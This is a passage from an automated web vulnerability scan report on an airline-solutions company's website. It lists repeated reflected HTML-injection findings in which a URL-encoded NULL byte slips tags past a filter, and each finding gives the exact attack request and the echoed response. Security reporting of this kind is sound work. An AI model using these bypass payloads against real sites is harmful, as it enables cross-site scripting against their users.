GET /home/products_services/enterprise_operations/downloads?%00149e5<a>f1657a73226=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>f1657a73226=1">downloads?%00149e5<a>f1657a73226=1</a> ...[SNIP]...
3.130. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d37f"><a>2a4fc9af41d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d37f"><a>2a4fc9af41d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/enterprise_operations/my_list/?%006d37f"><a>2a4fc9af41d=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/enterprise_operations/my_list/?%006d37f"><a>2a4fc9af41d=1"> ...[SNIP]...
3.131. http://www.sabreairlinesolutions.com/home/products_services/marketing_planning [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/products_services/marketing_planning
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fb6b0"><a>8510af1fb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb6b0"><a>8510af1fb38 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/marketing_planning?%00fb6b0"><a>8510af1fb38=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/commercial_planning?%00fb6b0"><a>8510af1fb38=1"> ...[SNIP]...
3.132. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5318"><a>81d14d067ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5318"><a>81d14d067ea in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/product/sabre_aircentre_acars_manager/?%00e5318"><a>81d14d067ea=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322089; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/products_services/sabre_aircentre_acars_manager/?%00e5318"><a>81d14d067ea=1"> ...[SNIP]...
3.133. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cdd01"><a>07b8258c1ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cdd01"><a>07b8258c1ef in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/product/sabre_aircentre_crew_qualifier?%00cdd01"><a>07b8258c1ef=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322624; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/products_services/sabre_aircentre_crew_qualifier?%00cdd01"><a>07b8258c1ef=1"> ...[SNIP]...
3.134. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00422ae"><a>63ba76bb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 422ae"><a>63ba76bb82 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/product/sabre_community_portal?%00422ae"><a>63ba76bb82=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/products_services/sabre_community_portal?%00422ae"><a>63ba76bb82=1"> ...[SNIP]...
3.135. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0044679"><a>67dc0282d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44679"><a>67dc0282d92 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/product/sabre_reaccommodation_manager/?%0044679"><a>67dc0282d92=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/products_services/sabre_reaccommodation_manager/?%0044679"><a>67dc0282d92=1"> ...[SNIP]...
3.136. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/products_services/product_index
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007974b"><a>89efa2fb4bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7974b"><a>89efa2fb4bb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/product_index?%007974b"><a>89efa2fb4bb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/products_services/product_index?%007974b"><a>89efa2fb4bb=1"> ...[SNIP]...
3.137. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/products_services/product_index
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d10f1<a>b0e40c23345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d10f1<a>b0e40c23345 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/product_index?%00d10f1<a>b0e40c23345=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>b0e40c23345=1">product index?%00d10f1<a>b0e40c23345=1</a> ...[SNIP]...
3.138. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0030872<a>2cdec2710d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30872<a>2cdec2710d7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/services/airline_community?%0030872<a>2cdec2710d7=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>2cdec2710d7=1">airline community?%0030872<a>2cdec2710d7=1</a> ...[SNIP]...
3.139. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f90d8"><a>16834f00eec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f90d8"><a>16834f00eec in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/services/airline_community/?%00f90d8"><a>16834f00eec=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a href="/home/products_services/services/airline_community/?%00f90d8"><a>16834f00eec=1"> ...[SNIP]...
3.140. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00df39f<a>023789d0898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df39f<a>023789d0898 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/services/airline_community/?%00df39f<a>023789d0898=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>023789d0898=1">?%00df39f<a>023789d0898=1</a> ...[SNIP]...
3.141. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002bc49<a>094e5b00dcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bc49<a>094e5b00dcb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
